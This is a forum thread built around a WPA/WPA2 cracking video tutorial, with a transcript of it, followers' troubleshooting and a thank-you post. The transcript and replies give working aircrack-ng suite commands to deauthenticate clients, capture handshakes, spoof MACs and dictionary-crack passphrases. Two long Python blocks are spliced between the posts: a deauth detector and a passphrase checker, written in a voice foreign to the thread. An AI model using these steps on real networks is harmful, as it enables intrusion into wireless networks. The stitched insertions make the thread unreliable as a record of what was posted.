
Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #41
    Junior Member
    Join Date
    Aug 2007
    Posts
    29

    Transcript of Xploitz WPA Cracking Tut #3

    Here is my submission of Xploitz WPA cracking vid #3.

    I was too lazy to re-type all of it, so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
    Enjoy.

  2. #42
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Revised transcript

    Quote Originally Posted by {In}Secure:
    Here is my submission of Xploitz WPA cracking vid #3.

    I was too lazy to re-type all of it, so I took some screenshots during the video, printed them, and then used an OCR program to create the txt file.
    Enjoy.

    Nice. Thanks for taking the time to do that. There were a few errors within the transcript, mainly because the OCR program that was used mixed up the number 1 with the letter l..and vice versa..and the number 0 for a Q, so ath0 was turned into athQ. I however demand accuracy with my tutorials...

    So here is my edited and revised copy of this transcript, not for download..but for online viewing. Feel free though to copy and paste it to Windows Notepad or Linux's KWrite. Thanks again {In}Secure for posting.



    Code:
    -=Xploitz=- E-Z Video Tutorial: Cracking WPA/WPA2
    Date of video: August 09, 2007

    Hello everyone, :)

    Welcome once again to another great E-Z VIDEO Tutorial taught
    to you by your newly appointed remote-exploit.org Moderator,
    me....-=Xploitz=-

    This time we're gonna step it up a little bit and try our hand at our
    WPA/WPA2 TKIP or TKIP+AES network. What's the difference
    between cracking a WPA network -VS- a WPA2 network??
    Answer...ABSOLUTELY NOTHING!! There is no difference between
    cracking WPA or WPA2 networks at all. In order to SUCCESSFULLY
    crack any WPA/WPA2 network, there are 2 main key things that
    must happen. (1) YOU MUST CAPTURE THE FULL 4 WAY
    HANDSHAKE!! AIRODUMP-NG WILL LET YOU KNOW BY TELLING
    YOU. IF YOU LOOK AT THE TOP RIGHT HAND CORNER OF YOUR
    AIRODUMP-NG SCREEN IT WILL REGISTER AND LET YOU KNOW BY
    SAYING "[ WPA handshake: 00:18:F8:B5:F2:D6 ]". (2) YOUR
    PASSPHRASE MUST BE IN THE DICTIONARY YOU CHOSE IN
    ORDER TO SUCCESSFULLY BRUTE FORCE IT WITH AIRCRACK-NG.

    ***SPECIAL NOTE!!!***
    IF YOUR NETWORK IS ENCRYPTED WITH WPA/WPA2 +AES.....
    COWPATTY WILL NOT WORK. COWPATTY ONLY WORKS
    WITH TKIP. That's why I'm using aircrack-ng to crack my
    WPA2/TKIP+AES network. NOW THAT THAT'S BEEN SAID,
    ...LET'S BEGIN SHALL WE??


    First off, we're gonna put our interface into monitor mode.
    To accomplish this we type in...

    airmon-ng stop <device>

    My device is Atheros chipped so it would look like...

    airmon-ng stop ath0

    Next, we type in...

    airmon-ng start <device>

    Again, my card is an Atheros chipped card so I'll use ath0 to
    place my ath0 interface into monitor mode. Other devices
    may only be required to use eth0, wlan0 etc... So for mine it's...

    airmon-ng start ath0

    Start airodump-ng to collect the authentication handshake.
    If you don't know your network's details, just type in...

    airodump-ng <device>

    Mine will look like...

    airodump-ng ath0

    After you run airodump and you see your network and
    its connected client(s),

    press ^c (That's Ctrl c)

    This action will break you out of airodump's process and
    give you a new command line. Use this when you want to
    switch back and forth to copy and paste your network's details.

    Now, open a new shell window and fill in all your network's
    info so that we can focus on only your network and lock
    onto it. To do this you'll type...

    airodump-ng -c (Channel your AP is on) -w (file name) --bssid (your AP's bssid here) <device>

    Mine looks like...

    airodump-ng -c 6 -w psk --bssid 00:18:F8:B5:F2:D6 ath0

    ***Important*** Do NOT use the --ivs option.
    You must capture the full packets!


    Use aireplay-ng to de-authenticate the wireless client.

    To accomplish this we type in...

    aireplay-ng -0 1 -a <AP MAC> -c <Client's MAC> <Device>

    Mine looks like this...

    aireplay-ng -0 1 -a 00:18:F8:B5:F2:D6 -c 08:14:A5:F6:83:E3 ath0

    You'll know your attack was successful if your
    airodump-ng screen looks similar to this...

    CH 6 ][ Elapsed: 2 mins ][ -08-08 14:37 ][ WPA handshake: 00:18:F8:B5:F2:D6

    BSSID              PWR RXQ  Beacons  #Data  #/s  CH  MB  ENC   CIPHER  AUTH  ESSID

    00:18:F8:B5:F2:D6   68       1298     645    3    6   48  WPA2  CCMP    PSK   XploitZ

    BSSID              STATION            PWR  Rate   Lost  Packets  Probes

    00:18:F8:B5:F2:D6  08:14:A5:F6:83:E3   56   54-54     0     1019


    Notice the "[ WPA handshake: 00:18:F8:B5:F2:D6 ]" in the upper
    part of the above text?? This confirms that you have captured
    the complete 4 way handshake. ;)

    ***IMPORTANT NOTE!!***
    If there is not a client connected, and you suspect there
    is one connected, just type in

    aireplay-ng -0 1 -a <BSSID> <Device>

    And they'll appear if they're connected!


    OPEN A NEW SHELL

    Run aircrack-ng to crack the pre-shared key.
    To do this we type in the command...

    aircrack-ng -w password.lst -b <AP's BSSID HERE> filename.cap

    Mine looks like this...

    aircrack-ng -w algae.txt -b 00:18:F8:B5:F2:D6 psk*.cap

    You can use .txt or .lst dictionaries. It doesn't matter which
    type of dictionary you use. Just make sure if your dictionary is
    called passwords.lst, you type in passwords.lst and not .txt.
    Also, your pass-phrase MUST BE IN THE DICTIONARY FOR
    THIS ATTACK TO WORK!! Also please note that my dictionary
    is located in my home folder or /root directory, therefore there is
    no need to type in the full path to my dictionary ;} There are
    other methods including the use of a pre-compiled list of
    passwords with your ESSID, but this particular tutorial will NOT
    cover it. I will do another video explaining step by step all the
    correct processes you need to build a database and pre-compile
    it with your ESSID and password list in the very near future.
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" - http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" - http://forums.remote-exploit.org/showthread.php?t=8041
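    The de-authentication step in the transcript above (aireplay-ng -0) is, seen from the network owner's side, the event a wireless IDS should flag: a station being kicked off by a burst of forged deauth frames so that it reconnects and replays the 4-way handshake. The Python below is an added example and is not part of this thread or of the aircrack-ng project. It runs a sliding-window detector over 802.11 management-frame records as a WIDS or a monitor-mode capture could export them; the record layout (timestamp, subtype, bssid, station) is an assumption made for the example, and the sample frames are constructed.

```python
"""Sliding-window detector for deauthentication bursts against a WPA/WPA2 network.

Added example, not from the thread or from aircrack-ng. The record layout
(timestamp, subtype, bssid, station) is an assumption for this example and
the sample records are constructed.
"""
from collections import defaultdict, deque

# 802.11 management frame subtypes used below.
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
KICK_SUBTYPES = {SUBTYPE_DISASSOC, SUBTYPE_DEAUTH}

# Constructed sample: one AP, two stations. STA_A receives six deauth
# frames within 300 ms; STA_B receives a single deauth (a normal
# disconnect) much later. MAC addresses are the ones from the transcript
# plus one made-up station.
AP = "00:18:F8:B5:F2:D6"
STA_A = "08:14:A5:F6:83:E3"
STA_B = "00:11:22:33:44:55"

SAMPLE_FRAMES = (
    [(0.0 + i * 0.1, SUBTYPE_BEACON, AP, "ff:ff:ff:ff:ff:ff") for i in range(20)]
    + [(10.0 + i * 0.05, SUBTYPE_DEAUTH, AP, STA_A) for i in range(6)]
    + [(40.0, SUBTYPE_DEAUTH, AP, STA_B)]
)


def find_deauth_bursts(frames, window_s=2.0, threshold=5):
    """Return [(bssid, station, first_ts, peak_count), ...] for every
    AP/station pair that sees at least `threshold` deauth or disassoc
    frames inside any sliding window of `window_s` seconds.

    `first_ts` is the timestamp of the frame that opened the window in
    which the threshold was first crossed; `peak_count` is the largest
    number of kick frames seen in one window for that pair."""
    recent = defaultdict(deque)  # (bssid, station) -> timestamps inside window
    peaks = {}                   # (bssid, station) -> (first_ts, peak_count)
    for ts, subtype, bssid, station in sorted(frames, key=lambda f: f[0]):
        if subtype not in KICK_SUBTYPES:
            continue  # beacons, probes etc. are irrelevant here
        key = (bssid, station)
        window = recent[key]
        window.append(ts)
        while ts - window[0] > window_s:
            window.popleft()  # drop frames that fell out of the window
        if len(window) >= threshold:
            first_ts, peak = peaks.get(key, (window[0], 0))
            if len(window) > peak:
                peaks[key] = (first_ts, len(window))
    return [(b, s, first, n) for (b, s), (first, n) in peaks.items()]


if __name__ == "__main__":
    for bssid, station, first_ts, count in find_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {count} frames to {station} on {bssid} "
              f"starting at t={first_ts:.2f}s")
```

    A single deauthentication on a clean disconnect is normal; five or more inside a couple of seconds is not, and the detector keys on the AP/station pair so a busy network with many unrelated disconnects does not trip it. The structural fix is 802.11w Protected Management Frames, which authenticates deauth and disassoc frames so that forged ones are discarded by the client; a detector like this one is for networks that cannot yet require it.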

  3. #43
    Junior Member
    Join Date
    Jun 2007
    Posts
    29


    It's ok

    card : Alfa AWUS036H
    chipset : rtl8187

    Unplug Alfa
    Boot VMware
    Code:
    cd rtl8187_linux_26.1010.0622.2006
    sh wlan0up
    plug Alfa
    Code:
    sh wlan0up
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0 1
    airodump-ng -c 1 -w psk --bssid [BSSID_AP] wlan0
    New shell
    Code:
    aireplay-ng -0 1 -a [BSSID_AP] -c [BSSID_CLIENT] wlan0
    Sending DeAuth to station -- STMAC : [[BSSID_CLIENT]]

    but no handshake

    PWR : about 50
    CH : 1
    ENC : WPA
    CIPHER : TKIP
    AUTH : PSK
    ESSID : AOLbox***

  4. #44
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Try doing -0 5 instead of -0 1 in your deauth command. You're close to the AP and the client, correct? You MUST BE CLOSE TO BOTH..not just the AP..it's different than in cracking WEP... where you only need to be close to the AP.

    BTW...why are you using macchanger for WPA/WPA2??? It's not needed since you're not using your card to connect or associate/authenticate with the AP.

  5. #45
    Junior Member
    Join Date
    Jun 2007
    Posts
    29


    I reach 60 at the maximum PWR for the AP
    I reach 35 at the maximum PWR for the CLIENT

    If I use another card on Windows XP and I try to connect to the AP, on VMware I can see another client (me) with a power of -1. But the command
    Code:
    aireplay-ng -0 1 -a [BSSID_AP] -c [MY_BSSID_CLIENT] wlan0
    gives nothing

    I tried -0 0 too

    EDIT : I have already tried 1.0-dev, but I was farther away when I tried 1.0-dev.
    I will try again.

  6. #46
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Have you updated to the most recent version of aircrack??

    svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
    cd aircrack-ng
    make
    make install

  7. #47
    Junior Member
    Join Date
    Jun 2007
    Posts
    29


    I tried both versions of aircrack.

    With 1.0dev, instead of

    Code:
    [ WPA handshake 00:18:F8:B5:F2:D6] (in your tuto)
    I can see this message
    Code:
    [ 140bytes keystream :[BSSID_AP]

  8. #48
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Don't use 1.0 dev for this..use my posted svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

    I say use that because there was an issue with the aircrack-ng dictionary capitals and special letters not working out right..example..my passphrase was -=Xploitz=-...I had -=Xploitz=- in my dictionary...but because of the -==- in my passphrase..aircrack dev 1.0 wouldn't read it right. So please use the above version instead. Don't know if it will fix your problem or not..but it's worth a shot.

    Do me a favor..test to see if you're on the same channel as the AP. Right before you enter your aireplay-ng -0 1 ..etc...command..do an ifconfig wlan0 and an iwconfig wlan0 to verify you're on the same channel. I'm starting to run out of solutions to help you. Have you updated your card's drivers as well??

    Try to see if your card is capable of injecting...

    aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 -i wlan0 ath0
    Where:
    • -9 means injection test. Long form is --test. (Double dash)
    • -e teddy is the network name (SSID). This is optional.
    • -a 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is optional.
    • -i wlan0 is the interface name of the second card if you want to determine which attacks your card supports. This is optional.
    • ath0 is the interface name or airserv-ng IP address plus port number. For example - 127.0.0.1:666. (Mandatory)
    IMPORTANT: You must set your card to the desired channel with airmon-ng prior to running any of the tests.

  9. #49
    Junior Member
    Join Date
    Jun 2007
    Posts
    29


    First, I think I already have the best version of aircrack.
    Mine is in /modules/aircrack_0.91.lzm
    On the page:
    Code:
    http://forums.remote-exploit.org/showthread.php?t=6784
    I have the version of 25/Jun/2007.
    Do I have to download this version?:
    Code:
    svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
    Secondly, I do the test:
    Code:
    airmon-ng start wlan0 1
    aireplay-ng -9 wlan0
    Code:
    00:14:6C:7E:40:80 - channel 1  - "teddy "
    Ping  : 2ms/25/49
    28/30 93%
    EDIT : I will try the latest version of my Alfa (*Update 26/Jun/2007)

    EDIT2 : I have a question, Xploitz.
    When I type
    Code:
    aircrack-ng -w pass psk*.cap
    I can see:
    Code:
    Encryption
    WEP (**IVs)
    But it's a WPA key for airodump-ng. Have you got an explanation?
    thanks

    EDIT3 : so I try to do
    aireplay-ng -1 1 -e teddy -a [AP_BSSID] -h [CLIENT_BSSID] wlan0
    but I have something like that:
    8:28:02 Sending Authentication Request
    18:28:02 Authentication successful
    18:28:02 Sending Association Request
    18:28:02 Association successful :-)
    18:28:02 Got a deauthentication packet!
    18:28:05 Sending Authentication Request
    18:28:05 Authentication successful
    18:28:05 Sending Association Request
    18:28:10 Sending Authentication Request
    18:28:10 Authentication successful
    18:28:10 Sending Association Request
    I don't think that is good.

    EDIT4 :
    With the latest version for the Alfa and aircrack 0.9.1svn499 :
    Code:
    aircrack-ng -w pass psk*.cap
    I can see:
    Code:
    Encryption
    WPA (0 handshake)
    it's better than WEP (**IVs)

  10. #50
    Junior Member
    Join Date
    Aug 2007
    Posts
    36

    Wow Awesome

    -=Xploitz=-

    WOW, this is a great video. I am a noobie, and for me it was wonderful. Very clear and concise.

    The one thing I was a little off about was having to have my WPA key in the password list. Wouldn't that defeat the purpose of really testing a network? I want to test my network or a client's network, but if I already knew their passcode then it is like "cheating".

    Have you done a video to try to crack a WPA without knowing the passcode?

    Either way, your tuts are always very easy for me to follow.

    Thank you. Keep up the awesome work.
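    The question in the post above (why the passphrase has to be in the list) comes down to what aircrack-ng must compute for every candidate word: the WPA/WPA2-PSK pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes, and a dictionary run simply derives that PMK per word and checks it against the captured handshake, so a passphrase that no list contains is never reached. The Python below is an added example, not code from this thread or from aircrack-ng: it derives the PMK as specified, checks a candidate passphrase the way a network owner would before choosing it (length and character rules, plus "is it a wordlist entry or a trivial variant of one"), and estimates how long an exhaustive search of a given keyspace takes at an assumed derivation rate. The wordlist, the candidate passphrases and the rate are constructed for the example.

```python
"""Passphrase-side view of the WPA/WPA2-PSK dictionary attack.

Added example, not from the thread or from aircrack-ng. The wordlist,
candidate passphrases and guess rate below are constructed.
"""
import hashlib

PMK_ITERATIONS = 4096  # iteration count fixed by the WPA/WPA2-PSK specification
PMK_LENGTH = 32        # 256-bit PMK


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).

    This is the passphrase-to-PMK mapping used by WPA/WPA2-PSK. A dictionary
    attack has to perform it once per candidate word, which is why the key
    only falls if the passphrase (or a variant of it) is in the list."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PMK_ITERATIONS, PMK_LENGTH)


def common_variants(word: str):
    """Yield a base word plus the case and suffix variants that wordlist
    rules usually add; a policy check treats all of them as 'in the list'."""
    for base in {word, word.lower(), word.upper(), word.capitalize()}:
        yield base
        for suffix in ("1", "12", "123", "!", "2007"):
            yield base + suffix


def check_wpa_passphrase(passphrase: str, wordlist) -> list:
    """Return a list of policy problems; an empty list means the passphrase
    passes. Length and character rules are the 802.11 passphrase rules
    (8 to 63 printable ASCII characters)."""
    problems = []
    if not 8 <= len(passphrase) <= 63:
        problems.append("length must be 8-63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        problems.append("only printable ASCII is allowed")
    for word in wordlist:
        if passphrase in common_variants(word):
            problems.append(f"matches wordlist entry {word!r} or a common variant")
            break
    return problems


def exhaustive_search_seconds(charset_size: int, length: int,
                              pmk_per_second: float) -> float:
    """Seconds needed to try every passphrase of `length` symbols drawn from a
    charset of `charset_size` symbols at `pmk_per_second` derivations per second
    (the rate is an input; measure it on the hardware you care about)."""
    return charset_size ** length / pmk_per_second


# Constructed wordlist standing in for password.lst / algae.txt from the thread.
CONSTRUCTED_WORDLIST = ["password", "xploitz", "algae", "letmein"]

if __name__ == "__main__":
    # Reference vector from the 802.11i test vectors: passphrase "password", SSID "IEEE".
    print("PMK(IEEE, password) =", derive_pmk("IEEE", "password").hex())
    for candidate in ("Xploitz1", "password", "short", "correct-horse-battery"):
        print(f"{candidate!r}: {check_wpa_passphrase(candidate, CONSTRUCTED_WORDLIST) or 'ok'}")
    days = exhaustive_search_seconds(62, 12, 1e6) / 86400  # assumed 1e6 PMK/s
    print(f"12 alphanumeric characters at 1e6 PMK/s: {days:.3e} days to exhaust")
```

    The PMK check against the published "password"/"IEEE" vector confirms the derivation is the real one rather than a stand-in. The practical takeaway for the poster's question is the one the transcript states: a dictionary run only finds what the dictionary contains, so the owner's control is to pick a passphrase that fails `check_wpa_passphrase` for no wordlist, and long enough that `exhaustive_search_seconds` is measured in years rather than days at any plausible rate.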
